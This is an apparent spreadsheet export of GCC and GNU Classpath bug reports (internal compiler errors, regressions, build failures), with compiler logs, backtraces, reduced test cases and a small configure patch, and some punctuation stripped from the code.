line:    #.stabs        ../../gcc-20010305/gcc/libgcc2.c10000$Ltext0
make[3]: *** [libgcc/./_clz.o] Error 1
make[3]: Leaving directory `/usr/local1/src/build/gcc-obj/gcc'
make[2]: *** [libgcc.a] Error 2
make[2]: Leaving directory `/usr/local1/src/build/gcc-obj/gcc'
make[1]: *** [stage1_build] Error 2
make[1]: Leaving directory `/usr/local1/src/build/gcc-obj/gcc'
make: *** [bootstrap] Error 2
I add the configure output and the (generated) '.s' file that does not compile
to this report.
Best regards
	Jeremie Petit.
Release:
gcc-2.95.3
Environment:
Compaq Tru64 UNIX 5.1
OSF1 iahhel.vbe.cpqcorp.net V5.1 732 alpha
Compaq C V6.3-025 on Compaq Tru64 UNIX V5.1 (Rev. 732)
Compiler Driver V6.3-026 (sys) cc Driver</t>
  </si>
  <si>
    <t>jeremie_petit</t>
  </si>
  <si>
    <t>GCC-5139</t>
  </si>
  <si>
    <t>[sgi-irix6.5] bootstrap crashes build gcc/gcc/libgcc2.c</t>
  </si>
  <si>
    <t>make bootstrap crashes during build with the following trace
mkdir libgcc/mabi=64
if [ -f stmp-dirs ] then true else touch stmp-dirs fi
./xgcc -B./ -B/usr/local/mips-sgi-irix6.5/bin/ -isystem /usr/local/mips-sgi-irix6.5/include -isystem /usr/local/mips-sgi-irix6.5/sys-include -O2  -DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -isystem ./include   -g1 -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED  -I. -I. -I/toastershare/gcc/gcc -I/toastershare/gcc/gcc/. -I/toastershare/gcc/gcc/config -I/toastershare/gcc/gcc/../include  -DL_muldi3 -c /toastershare/gcc/gcc/libgcc2.c -o libgcc/./_muldi3.o
/toastershare/gcc/gcc/libgcc2.c: In function `__muldi3':
/toastershare/gcc/gcc/libgcc2.c:359: Internal compiler error in c_expand_expr at c-common.c:3453
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
gmake[3]: *** [libgcc/./_muldi3.o] Error 1
gmake[3]: Leaving directory `/usr/people/dan/gcc-build/gcc'
gmake[2]: *** [stmp-multilib] Error 2
gmake[2]: Leaving directory `/usr/people/dan/gcc-build/gcc'
gmake[1]: *** [stage1_build] Error 2
gmake[1]: Leaving directory `/usr/people/dan/gcc-build/gcc'
gmake: *** [bootstrap] Error 2
Release:
cvs latest (12/17/2001)
Environment:
SGI Octane IRIX 6.5.12 bootstrap build with canned gcc 3.0.1 from freeware.sgi.com
How-To-Repeat:
check out code under irix configure with 
/toastershare/gcc/configure --enable-libgcj --enable-threads=posix --enable-shared=true
try to build with gmake bootstrap</t>
  </si>
  <si>
    <t>GCC-47678</t>
  </si>
  <si>
    <t>[4.6 regression] missing error message for -I</t>
  </si>
  <si>
    <t>The error message for a missing argument to -I has disappeared.  It used to be:
gcc: argument to '-I' is missing
Now a cryptic message is issued:
cc1: fatal error: /home/eric/build/gcc/native32/gcc/../lib/gcc/i586-suse-linux/4.6.0/: No such file or directory
compilation terminated.
As a matter of fact the Ada compiler is also affected.</t>
  </si>
  <si>
    <t>GCC-16975</t>
  </si>
  <si>
    <t>Tremendous increase in compile times for 3.4.1 with -mcpu=G5</t>
  </si>
  <si>
    <t>It seems that specifying -mcpu=G5 leads to a tremendous increase in compile time
for 3.4.1.
Here's the compiler I'm using:
[descartes:~/programs/gambc40b4-devel] lucier% gcc -v
Reading specs from /pkgs/gcc-3.4.1/lib/gcc/powerpc-apple-darwin7.5.0/3.4.1/specs
Configured with: ../configure --prefix=/pkgs/gcc-3.4.1
Thread model: posix
gcc version 3.4.1
Here's a typical compile command in building Gambit-C:
gcc -mcpu=G4 -I../include -no-cpp-precomp -Wall -W -Wno-unused -O1
-fno-math-errno -fschedule-insns2 -fno-trapping-math -fno-strict-aliasing
-fomit-frame-pointer -fPIC -fno-common -DHAVE_CONFIG_H -c _gsc_.c
The time for make -j with -mcpu=G5:
633.250u 15.960s 9:57.25 108.6% 0+0k 1+101io 0pf+0w
The time for make -j with -mcpu=G4:
107.190u 13.420s 1:23.98 143.6% 0+0k 0+63io 0pf+0w
A typicial bad file can be found at
http://www.math.purdue.edu/~lucier/GNATS/GNATS-12/_num.i.gz</t>
  </si>
  <si>
    <t>GCC-79906</t>
  </si>
  <si>
    <t>ICE in rs6000_inner_target_options at config/rs6000/rs6000.c:39199</t>
  </si>
  <si>
    <t>Target attribute with invalid value should produce error message instead of ICE:
$ ppc64le-linux-gnu-g++ /home/marxin/Programming/gcc/gcc/testsuite/g++.dg/ext/mv8.C 
/home/marxin/Programming/gcc/gcc/testsuite/g++.dg/ext/mv8.C:5:15: internal compiler error: in rs6000_inner_target_options at config/rs6000/rs6000.c:39199
 void foo (void) // { dg-error not a string }
               ^
0x108715c rs6000_inner_target_options
	.././../gcc/config/rs6000/rs6000.c:39199
0x1086e1c rs6000_inner_target_options
	.././../gcc/config/rs6000/rs6000.c:39189
0x109d3a7 rs6000_valid_attribute_p
	.././../gcc/config/rs6000/rs6000.c:39297
0x8cabf1 handle_target_attribute
	.././../gcc/c-family/c-attribs.c:3028
0x854a53 decl_attributes(tree_node** tree_node* int)
	.././../gcc/attribs.c:548
0x6e5a2e cplus_decl_attributes(tree_node** tree_node* int)
	.././../gcc/cp/decl2.c:1436
0x5b3e36 grokfndecl
	.././../gcc/cp/decl.c:8859
0x634462 grokdeclarator(cp_declarator const* cp_decl_specifier_seq* decl_context int tree_node**)
	.././../gcc/cp/decl.c:12225
0x636d56 start_function(cp_decl_specifier_seq* cp_declarator const* tree_node*)
	.././../gcc/cp/decl.c:15137
0x737622 cp_parser_function_definition_from_specifiers_and_declarator
	.././../gcc/cp/parser.c:26129
0x737622 cp_parser_init_declarator
	.././../gcc/cp/parser.c:19141
0x73830f cp_parser_simple_declaration
	.././../gcc/cp/parser.c:12773
0x73906a cp_parser_block_declaration
	.././../gcc/cp/parser.c:12599
0x740fde cp_parser_declaration
	.././../gcc/cp/parser.c:12496
0x741436 cp_parser_declaration_seq_opt
	.././../gcc/cp/parser.c:12372
0x741768 cp_parser_translation_unit
	.././../gcc/cp/parser.c:4366
0x741768 c_parse_file()
	.././../gcc/cp/parser.c:38427
0x8a4f72 c_common_parse_file()
	.././../gcc/c-family/c-opts.c:1107</t>
  </si>
  <si>
    <t>GCC-27102</t>
  </si>
  <si>
    <t>[4.1 regression] ICE with invalid class name in function template</t>
  </si>
  <si>
    <t>gcc gives segmenation fault on the following code:
template 
void T::foo() {
}</t>
  </si>
  <si>
    <t>mmirzaza</t>
  </si>
  <si>
    <t>GCC-39432</t>
  </si>
  <si>
    <t>[4.4 Regression] gdb.base/store.exp failures</t>
  </si>
  <si>
    <t>Running ../../../gdb/testsuite/gdb.base/store.exp ...
FAIL: gdb.base/store.exp: upvar charest l print old l expecting -1 .*
FAIL: gdb.base/store.exp: upvar short l print old l expecting -1
FAIL: gdb.base/store.exp: upvar int l print old l expecting -1
FAIL: gdb.base/store.exp: upvar long l print old l expecting -1
FAIL: gdb.base/store.exp: upvar longest l print old l expecting -1
FAIL: gdb.base/store.exp: upvar doublest l print old l expecting -1
are new failures in gdb testsuite when compiled with 4.4 compared to store.c compiled with 4.3.x.  The difference seems to be introduced by IRA when compiled with -fno-ira (when trunk still had that option) the test worked.
With the old RA -g -O0 -dA -fverbose-asm compiled:
unsigned int foo (unsigned int unsigned int)
unsigned int bar (register unsigned int a register unsigned int b)
{
  register unsigned int c = a d = b
  c = foo (c d)
  return c + d
}
d is allocated in a call-saved register (%ebx) which is fine and c is assigned a stack slot.  With IRA d is still allocated in %ebx but c is in %eax call-clobbered register.  So when gdb in the foo call does up and checks the value in c and d it finds correct value of d but garbage in c.
Could we perhaps at -O0 avoid allocating user variables that are live accross function calls in call-clobbered registers?  For -O1 it is obviously a fine decision.</t>
  </si>
  <si>
    <t>GCC-22444</t>
  </si>
  <si>
    <t>[4.1 regression]  ICE at tree-into-ssa.c:466</t>
  </si>
  <si>
    <t>Last known to work with: Sat Jul  9 22:01:35 UTC 2005.
Known to fail with: Sun Jul 10 06:32:56 UTC 2005.
With LAST_UPDATED: Tue Jul 12 03:25:01 UTC 2005 I still get:
Running
/home/hp/combined/combined/libstdc++-v3/testsuite/libstdc++-dg/normal.exp ...
FAIL: 23_containers/set/explicit_instantiation/3.cc (test for excess errors)
With the message in the .log being (c-n-p):
/home/hp/combined/crislinux-sim/cris-axis-linux-gnu/libstdc++-v3/include/bits/stl_set.h:
In member function 'std::pair&lt;typename s\
td::_Rb_tree _Compare typename
_Alloc::rebind::other&gt;::const_iterator bool&gt; std::set&lt;_K\
ey _Compare _Alloc&gt;::insert(const _Key&amp;) [with _Key =
__gnu_test::NonDefaultConstructible _Compare = std::less&lt;__gnu_test::Non\
DefaultConstructible&gt; _Alloc =
std::allocator]':^M
/home/hp/combined/crislinux-sim/cris-axis-linux-gnu/libstdc++-v3/include/bits/stl_set.h:318:
internal compiler error: tree check:\
 expected ssa_name have var_decl in is_old_name at tree-into-ssa.c:466^M
Will attach preprocessed source.</t>
  </si>
  <si>
    <t>GCC-17290</t>
  </si>
  <si>
    <t>[4.0 Regression] Wrong Java dependencies are generated</t>
  </si>
  <si>
    <t>When I have gcc 3.5 installed under /usr/gcc-3.5 libjava dependencies generated by
gcc use the installed files instead of those just built:
[hjl@gnu-64 libjava]$ /export/build/gnu/gcc/build-x86_64-linux/gcc/gcj
-B/export/build/gnu/gcc/build-x86_64-linux/gcc/
-B/usr/gcc-3.5/x86_64-unknown-linux-gnu/bin/
-B/usr/gcc-3.5/x86_64-unknown-linux-gnu/lib/ -isystem
/usr/gcc-3.5/x86_64-unknown-linux-gnu/include -isystem
/usr/gcc-3.5/x86_64-unknown-linux-gnu/sys-include -ffloat-store
-fno-omit-frame-pointer --encoding=UTF-8 -Wno-deprecated -g -O2 -MT
javax/swing/border/AbstractBorder.lo -MD -MP -MF
javax/swing/border/.deps/AbstractBorder.Tpo -c
/net/gnu/export/gnu/src/gcc/gcc/libjava/javax/swing/border/AbstractBorder.java
-o javax/swing/border/AbstractBorder.o
[hjl@gnu-64 libjava]$ !cat
cat javax/swing/border/.deps/AbstractBorder.Tpo
javax/swing/border/AbstractBorder.lo:  \
 /net/gnu/export/gnu/src/gcc/gcc/libjava/javax/swing/border/AbstractBorder.java \
  /usr/gcc-3.5/share/java/libgcj-3.5.0.jar java/io/Serializable.class \
  java/lang/Object.class java/awt/Rectangle.class \
  java/awt/geom/Rectangle2D.class java/awt/geom/RectangularShape.class \
  java/lang/Cloneable.class java/awt/Shape.class \
  java/awt/geom/Rectangle2D$$Double.class \
  java/awt/geom/Rectangle2D$$Float.class java/awt/Insets.class \
  java/awt/Graphics.class java/awt/Component.class \
  java/awt/MenuContainer.class java/awt/image/ImageObserver.class \
  java/awt/Component$$AccessibleAWTComponent.class \
  javax/accessibility/AccessibleContext.class \
  javax/accessibility/AccessibleComponent.class \
  java/awt/Component$$AccessibleAWTComponent$$AccessibleAWTComponentHandler.class \
  java/awt/event/ComponentListener.class java/util/EventListener.class \
  java/awt/Component$$AccessibleAWTComponent$$AccessibleAWTFocusHandler.class \
  java/awt/event/FocusListener.class \
  java/awt/Component$$BltBufferStrategy.class \
  java/awt/image/BufferStrategy.class \
  java/awt/Component$$FlipBufferStrategy.class \
  javax/swing/border/Border.class java/awt/Point.class \
  java/awt/geom/Point2D.class java/awt/geom/Point2D$$Double.class \
  java/awt/geom/Point2D$$Float.class java/awt/Dimension.class \
  java/awt/geom/Dimension2D.class java/lang/Class.class</t>
  </si>
  <si>
    <t>GCC-18954</t>
  </si>
  <si>
    <t>ICE with mudflap in fold_convert at fold-const.c:1899</t>
  </si>
  <si>
    <t>following code ICEs with -fmudflap -O2 
$ gcc-4.0 -fmudflap -O2 -c xx.i 
xx.i: In function #f#: 
xx.i:11: internal compiler error: in fold_convert at fold-const.c:1899 
$</t>
  </si>
  <si>
    <t>GCC-23307</t>
  </si>
  <si>
    <t>[3.4 Regression] ICE in cp_parser_template_id at cp/parser.c:8564 with Boost remote_call_manager</t>
  </si>
  <si>
    <t>The file below gives internal compiler error: in cp_parser_template_id at cp/parser.c:8564.  It's a 
Delta-reduced version of a preprocessed version of the Boost file remote_call_manager.cpp but 
missing some header files.
class remote_call_manager: private noncopyable
{
    template
    static R execute_now(function 
           inline void remote_call_manager::execute_now(function &amp;rFunctor)
    This sounds like bug 9781 among others but that's supposedly fixed.
    Here's the session:
312&gt; /opt/gcc401chk/bin/g++ -v  ../cpp/bugfiles/GCC_bugfiles/error/
105390_remote_call_manager_min.ii
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../configure --enable-checking --prefix=/opt/gcc401chk --enable-languages=cc+
+
Thread model: posix
gcc version 4.0.1
 /opt/gcc401chk/libexec/gcc/i686-pc-linux-gnu/4.0.1/cc1plus -fpreprocessed ../cpp/bugfiles/
GCC_bugfiles/error/105390_remote_call_manager_min.ii -quiet -dumpbase 
105390_remote_call_manager_min.ii -mtune=pentiumpro -auxbase 105390_remote_call_manager_min 
-version -o /tmp/ccsSRpV5.s
GNU C++ version 4.0.1 (i686-pc-linux-gnu)
        compiled by GNU C version 3.3.4 (pre 3.3.5 20040809).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
../cpp/bugfiles/GCC_bugfiles/error/105390_remote_call_manager_min.ii:2: error: expected class-name 
before â€˜{â€™ token
../cpp/bugfiles/GCC_bugfiles/error/105390_remote_call_manager_min.ii:4: error: â€˜functionâ€™ was not 
declared in this scope
../cpp/bugfiles/GCC_bugfiles/error/105390_remote_call_manager_min.ii:4: error: expected primary-
expression before â€˜&gt;â€™ token
../cpp/bugfiles/GCC_bugfiles/error/105390_remote_call_manager_min.ii:4: error: â€˜rFunctorâ€™ was not 
declared in this scope
../cpp/bugfiles/GCC_bugfiles/error/105390_remote_call_manager_min.ii:4: error: template declaration 
of â€˜R remote_call_manager::execute_nowâ€™
../cpp/bugfiles/GCC_bugfiles/error/105390_remote_call_manager_min.ii:5: internal compiler error: in 
cp_parser_template_id at cp/parser.c:8564</t>
  </si>
  <si>
    <t>flash</t>
  </si>
  <si>
    <t>CLASSPATH-23006</t>
  </si>
  <si>
    <t>swing: JTextArea's scroll bar is shown only after window resize</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Compile and run the attached testcase.
Expected results:
1. A window with textarea shows up. Lines 0-18 and vertical scroll bar are visible. (Sun's jdk shows horizontal scroll bar too but that is unnecessary.)
Actual results:
1. A window with textarea shows up. Lines 0-20 are visible but there are no visible scroll bars.
Testcase:
import javax.swing.*
public class testcase extends JFrame {
        public static void main(String[] args) {
                new testcase().show()
        }
        public testcase() {
                JTextArea area = new JTextArea(20 45)
                JScrollPane scrollpane = new JScrollPane(area)
                this.setContentPane(scrollpane)
                this.pack()
                for (int i=0 i&lt;80 i++) {
                        area.append(line# + i + 
)
                }
        }
}
Note that if you resize the window then vertical scroll bar is shown correctly.</t>
  </si>
  <si>
    <t>GCC-60169</t>
  </si>
  <si>
    <t>[4.8/4.9 Regression] ICE ARM thumb1 handles far jump</t>
  </si>
  <si>
    <t>Created attachment 32119
testcase
Trunk gcc 20140210:
arm-none-eabi-gcc -mthumb -fomit-frame-pointer -mthumb -fPIC -mcpu=cortex-m0 -mno-lra png.c -c
png.c: In function 'png_do_read_swap_alpha':
png.c:104:1: internal compiler error: in reload at reload1.c:1058
 }
 ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>joey.ye</t>
  </si>
  <si>
    <t>GCC-81080</t>
  </si>
  <si>
    <t>target libgcov not built with large file support</t>
  </si>
  <si>
    <t>On x86_64 the 32bit libgcov runtime is not built with large file support.  It seems we end up including tconfig.h which will simply source auto-host.h which is _not_ appropriate (or enough) for multilibs?
It looks like the auto-target.h produced in libgcc/ is only included from unwind-c.c though which seems kind-of odd (it's also odd that it includes
it _after_ tsystem.h ...)
The following seems to work to produce a x86_64-unknown-linux-gnu/32/libgcc/libgcov.a with LFS support:
Index: configure.ac
===================================================================
--- configure.ac        (revision 249145)
+++ configure.ac        (working copy)
@@ -1916 +1918 @@ GCC_NO_EXECUTABLES
 AC_PROG_CC
 AC_PROG_CPP_WERROR
+AC_SYS_LARGEFILE
+
 AC_CHECK_SIZEOF([double])
 AC_CHECK_SIZEOF([long double])
 AS_VAR_ARITH([double_type_size] [$ac_cv_sizeof_double \* 8])
Index: libgcov.h
===================================================================
--- libgcov.h   (revision 249145)
+++ libgcov.h   (working copy)
@@ -386 +387 @@
 /* This path will be used by libgcov runtime.  */
 #include tconfig.h
+#include auto-target.h
 #include tsystem.h
 #include coretypes.h
 #include tm.h
Joseph is the above a suitable fix?</t>
  </si>
  <si>
    <t>GCC-23511</t>
  </si>
  <si>
    <t>[4.1 Regression] Segfault in fold_binary</t>
  </si>
  <si>
    <t>Compiling glibc I get a segmentation fault:
/opt/gcc/4.1-devel/libexec/gcc/x86_64-suse-linux-gnu/4.1.0/cc1 -fpreprocessed
strptime_l.i -quiet -dumpbase strptime_l.c -mtune=k8 -auxbase-strip
/builds/glibc/4.1+nptl/time/strptime_l.o -g -O2 -Wall -Winline
-Wstrict-prototypes -Wwrite-strings -std=gnu99 -version -o strptime_l.s
GNU C version 4.1.0 20050821 (experimental) (x86_64-suse-linux-gnu)
        compiled by GNU C version 4.1.0 20050821 (experimental).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: 5a830930ea2c878ce9ab608e6b40e0e8
strptime_l.i: In function â€˜__strptime_internalâ€™:
strptime_l.i:7079: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
(gdb) r -fpreprocessed strptime_l.i -quiet -dumpbase strptime_l.c -mtune=k8
-auxbase-strip /builds/glibc/4.1+nptl/time/strptime_l.o -g -O2 -Wall -Winline
-Wstrict-prototypes -Wwrite-strings -std=gnu99 -version -o strptime_l.s
GNU C version 4.1.0 20050821 (experimental) (x86_64-suse-linux-gnu)
        compiled by GNU C version 4.1.0 20050821 (experimental).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: 5a830930ea2c878ce9ab608e6b40e0e8
Program received signal SIGSEGV Segmentation fault.
fold_binary (code=MINUS_EXPR type=0x2aaaaadf86e0 op0=0x0 op1=0x2aaaab27ad80)
at /cvs/gcc/gcc/fold-const.c:7127
7127          if (TREE_CODE (arg0) == COMPOUND_EXPR)
(gdb) bt
#0  fold_binary (code=MINUS_EXPR type=0x2aaaaadf86e0 op0=0x0
op1=0x2aaaab27ad80) at /cvs/gcc/gcc/fold-const.c:7127
#1  0x000000000060e919 in fold_build2_stat (code=MINUS_EXPR
type=0x2aaaaadf86e0 op0=0x0 op1=0x2aaaab27ad80)
    at /cvs/gcc/gcc/fold-const.c:10480
#2  0x00000000004d1010 in estimate_numbers_of_iterations_loop (loop=0xf4f7c0) at
/cvs/gcc/gcc/tree-ssa-loop-niter.c:1471
#3  0x00000000004d1588 in scev_probably_wraps_p (type=0x2aaaaadf86e0
base= step=
    at_stmt=0x0 loop=0xf4f7c0 init_is_max=0x7fffffffd5e7 
unknown_max=0x7fffffffd5e7 )
    at /cvs/gcc/gcc/tree-ssa-loop-niter.c:1949
#4  0x00000000009d4552 in chrec_convert (type=0x2aaaaadf86e0
chrec=0x2aaaab33c960 at_stmt=0x0) at /cvs/gcc/gcc/tree-chrec.c:1133
#5  0x00000000009d9fde in instantiate_parameters_1 (loop=0xf4f7c0
chrec=0x2aaaab2fd180 allow_superloop_chrecs=1 '\001'
    cache=0xf144c0) at /cvs/gcc/gcc/tree-scalar-evolution.c:2080
#6  0x00000000009dab81 in instantiate_parameters (loop=0xf4f7c0
chrec=0x2aaaab2fd180) at /cvs/gcc/gcc/tree-scalar-evolution.c:2174
#7  0x000000000097e845 in vrp_visit_assignment (stmt=0x2aaaab37f870
output_p=0x7fffffffd730) at /cvs/gcc/gcc/tree-vrp.c:1544
#8  0x00000000004e4456 in simulate_stmt (stmt=0x2aaaab37f870) at
/cvs/gcc/gcc/tree-ssa-propagate.c:301
#9  0x00000000004e4bb9 in ssa_propagate (visit_stmt=
visit_phi=)
    at /cvs/gcc/gcc/tree-ssa-propagate.c:424
#10 0x00000000009806b4 in execute_vrp () at /cvs/gcc/gcc/tree-vrp.c:3915
#11 0x000000000097077c in execute_one_pass (pass=0xd92860) at
/cvs/gcc/gcc/passes.c:808
#12 0x00000000009708ac in execute_pass_list (pass=0xd92860) at
/cvs/gcc/gcc/passes.c:840
#13 0x00000000009708be in execute_pass_list (pass=0xd8eac0) at
/cvs/gcc/gcc/passes.c:841
#14 0x0000000000483135 in tree_rest_of_compilation (fndecl=0x2aaaab047500) at
/cvs/gcc/gcc/tree-optimize.c:419
#15 0x000000000040bf4d in c_expand_body (fndecl=0x2aaaab047500) at
/cvs/gcc/gcc/c-decl.c:6633
#16 0x00000000009c4a26 in cgraph_expand_function (node=0x2aaaab373160) at
/cvs/gcc/gcc/cgraphunit.c:1037
#17 0x00000000009c6bbb in cgraph_optimize () at /cvs/gcc/gcc/cgraphunit.c:1103
#18 0x0000000000416123 in c_write_global_declarations () at
/cvs/gcc/gcc/c-decl.c:7618
#19 0x00000000009425d6 in toplev_main (argc= argv=&lt;value
optimized out&gt;) at /cvs/gcc/gcc/toplev.c:984
#20 0x00002aaaaabde54a in __libc_start_main () from /lib64/tls/libc.so.6
#21 0x000000000040265a in _start () at start.S:113
(gdb) pt type
 &lt;integer_type 0x2aaaaadf86e0 long unsigned int sizes-gimplified asm_written
public unsigned DI
    size &lt;integer_cst 0x2aaaaadeac30 type &lt;integer_type 0x2aaaaadf80b0
bit_size_type&gt; constant invariant 64&gt;
    unit size &lt;integer_cst 0x2aaaaadeac60 type &lt;integer_type 0x2aaaaadf8000 long
unsigned int&gt; constant invariant 8&gt;
    align 64 symtab -1428224608 alias set -1 precision 64 min &lt;integer_cst
0x2aaaaadead50 0&gt; max 
    pointer_to_this &gt;
(gdb) pt op1
  constant
invariant 0&gt;
This bug has been introduced during the last 7 days.</t>
  </si>
  <si>
    <t>GCC-34709</t>
  </si>
  <si>
    <t>[4.3 regression]: revision 131342 miscompiled 481.wrf on Linux/Intel64</t>
  </si>
  <si>
    <t>This patch
http://gcc.gnu.org/ml/gcc-patches/2008-01/msg00191.html
miscompiled 481.wrf in SPEC CPU 2006 on Linux/Intel64 with -O2 -ffast-math.
The resulting 481.wrf segfaulted.</t>
  </si>
  <si>
    <t>GCC-81180</t>
  </si>
  <si>
    <t>[7/8 Regression] ICE with class template deduction in nested template class</t>
  </si>
  <si>
    <t>template  struct int_{}
template 
struct A{
    template 
    struct B{
        B(U u int_){}
    }
}
int main(){
    A::B v(0 int_())
    (void)v
}
results in:
$ g++-7.1 -std=c++1z -o main gcc-bug.cpp 
gcc-bug.cpp: In function 'int main()':
gcc-bug.cpp:7:3: internal compiler error: unexpected expression 'I' of kind template_parm_index
   B(U u int_){}
   ^
0x7139d9 cxx_eval_constant_expression
        ../../gcc/gcc/cp/constexpr.c:4582
0x7150f4 cxx_eval_outermost_constant_expr
        ../../gcc/gcc/cp/constexpr.c:4640
0x716dde maybe_constant_value(tree_node* tree_node*)
        ../../gcc/gcc/cp/constexpr.c:4855
0x622b8a convert_nontype_argument
        ../../gcc/gcc/cp/pt.c:6500
0x622b8a convert_template_argument
        ../../gcc/gcc/cp/pt.c:7668
0x62347c coerce_template_parms
        ../../gcc/gcc/cp/pt.c:8128
0x625367 coerce_innermost_template_parms
        ../../gcc/gcc/cp/pt.c:8219
0x6257e9 lookup_template_class_1
        ../../gcc/gcc/cp/pt.c:8664
0x6257e9 lookup_template_class(tree_node* tree_node* tree_node* tree_node* int int)
        ../../gcc/gcc/cp/pt.c:9009
0x626b61 tsubst_aggr_type
        ../../gcc/gcc/cp/pt.c:11905
0x627e53 tsubst_decl
        ../../gcc/gcc/cp/pt.c:12270
0x6170af tsubst(tree_node* tree_node* int tree_node*)
        ../../gcc/gcc/cp/pt.c:13322
0x61a3bc build_deduction_guide
        ../../gcc/gcc/cp/pt.c:25058
0x61aefe do_class_deduction
        ../../gcc/gcc/cp/pt.c:25235
0x61aefe do_auto_deduction(tree_node* tree_node* tree_node* int auto_deduction_context tree_node* int)
        ../../gcc/gcc/cp/pt.c:25341
0x5f7bbb cp_finish_decl(tree_node* tree_node* bool tree_node* int)
        ../../gcc/gcc/cp/decl.c:6835
0x6870e7 cp_parser_init_declarator
        ../../gcc/gcc/cp/parser.c:19380
0x68792d cp_parser_simple_declaration
        ../../gcc/gcc/cp/parser.c:12777
0x688535 cp_parser_block_declaration
        ../../gcc/gcc/cp/parser.c:12602
0x688e49 cp_parser_declaration_statement
        ../../gcc/gcc/cp/parser.c:12212
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Compiled with:
$ g++-7.1 --version
g++-7.1 (GCC) 7.1.1 20170509
Copyright (C) 2017 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.</t>
  </si>
  <si>
    <t>GCC-27571</t>
  </si>
  <si>
    <t>[4.2 regression] alpha: ICE in get_attr_usegp at config/alpha/alpha.md:171</t>
  </si>
  <si>
    <t>ICE in get_attr_usegp at config/alpha/alpha.md:171 using gcc 4.2.0 20060508:
tbm@juist:~$ /usr/lib/gcc-snapshot/bin/gcc -c -O1 mini.c
mini.c: In function 'r7to_double':
mini.c:36: error: unrecognizable insn:
(jump_insn 50 49 51 (addr_diff_vec:SI (label_ref:DI 49)
         [
            (label_ref:DI 52)
            (label_ref:DI 62)
            (label_ref:DI 70)
            (label_ref:DI 171)
            (label_ref:DI 171)
            (label_ref:DI 70)
            (label_ref:DI 70)
        ]
        (const_int 0 [0x0])
        (const_int 0 [0x0])) -1 (nil)
    (nil))
mini.c:36: internal compiler error: in get_attr_usegp at config/alpha/alpha.md:171
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
tbm@juist:~$ /usr/lib/gcc-snapshot/bin/gcc -c mini.c
tbm@juist:~$ gcc-4.1 -c -O2 mini.c
tbm@juist:~$</t>
  </si>
  <si>
    <t>GCC-3997</t>
  </si>
  <si>
    <t>gcc generates ..ng references for static aliases (alpha-linux)</t>
  </si>
  <si>
    <t>[ Reported to the Debian BTS as report #108036.
  Please CC 108036-quiet@bugs.debian.org on replies.
  Log of report can be found at http://bugs.debian.org/108036 ]
This file compiles but doesn't link on alpha:
#include 
void foo(int)
static void bar(int) __attribute__ ((noreturn))
void foo(int k) {
	if (k) {
		exit(k)
	}
}
static void bar(int) __attribute__ ((alias(foo)))
int main(int k) {
	if (k &lt; 0) {
		bar(1)
	}
	return k
}
What happens is that gcc generates a reference to bar..ng but the alias
only exists for bar.  The problem goes away when bar is not declared as
static.
I've reproduced this problem with gcc-3.0 as well.
Release:
3.0 (Debian GNU/Linux)
Environment:
System: Debian GNU/Linux (testing/unstable)
Architecture: alpha
host: alpha-linux
build: alpha-linux
target: alpha-linux</t>
  </si>
  <si>
    <t>108036-quiet</t>
  </si>
  <si>
    <t>GCC-25989</t>
  </si>
  <si>
    <t>gomp ICE with -O2 and schedule(guided)</t>
  </si>
  <si>
    <t>/home/perrin/gcc_HEAD/INSTALL/110282/bin/gcc -Wall -std=c99 -v --save-temps -O2  -fopenmp        -m64 -o test_gomp_2 test_gomp_2.c
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: /home/perrin/gcc_HEAD/gcc/configure --prefix=/home/perrin/gcc_HEAD/INSTALL/110282/ --enable-threads=posix --enable-languages=cc++fortran
Thread model: posix
gcc version 4.2.0 20060126 (experimental)
 /home/perrin/gcc_HEAD/INSTALL/110282/bin/../libexec/gcc/x86_64-unknown-linux-gnu/4.2.0/cc1 -E -quiet -v -iprefix /home/perrin/gcc_HEAD/INSTALL/110282/bin/../lib/gcc/x86_64-unknown-linux-gnu/4.2.0/ -D_REENTRANT test_gomp_2.c -m64 -mtune=generic -std=c99 -Wall -fopenmp -O2 -fpch-preprocess -o test_gomp_2.i
ignoring nonexistent directory /home/perrin/gcc_HEAD/INSTALL/110282/bin/../lib/gcc/x86_64-unknown-linux-gnu/4.2.0/../../../../x86_64-unknown-linux-gnu/include
ignoring duplicate directory /home/perrin/gcc_HEAD/INSTALL/110282//lib/gcc/x86_64-unknown-linux-gnu/4.2.0/include
ignoring nonexistent directory /home/perrin/gcc_HEAD/INSTALL/110282//lib/gcc/x86_64-unknown-linux-gnu/4.2.0/../../../../x86_64-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /home/perrin/gcc_HEAD/INSTALL/110282/bin/../lib/gcc/x86_64-unknown-linux-gnu/4.2.0/include
 /usr/local/include
 /home/perrin/gcc_HEAD/INSTALL/110282//include
 /usr/include
End of search list.
 /home/perrin/gcc_HEAD/INSTALL/110282/bin/../libexec/gcc/x86_64-unknown-linux-gnu/4.2.0/cc1 -fpreprocessed test_gomp_2.i -quiet -dumpbase test_gomp_2.c -m64 -mtune=generic -auxbase test_gomp_2 -O2 -Wall -std=c99 -version -fopenmp -o test_gomp_2.s
GNU C version 4.2.0 20060126 (experimental) (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.2.0 20060126 (experimental).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: bafa485bbf5b021c2e63fce173a125c4
test_gomp_2.c: In function 'main.omp_fn.0':
test_gomp_2.c:10: error: invalid operand to unary operator
.istart0.2D.1817
test_gomp_2.c:10: error: invalid operand to unary operator
.iend0.3D.1818
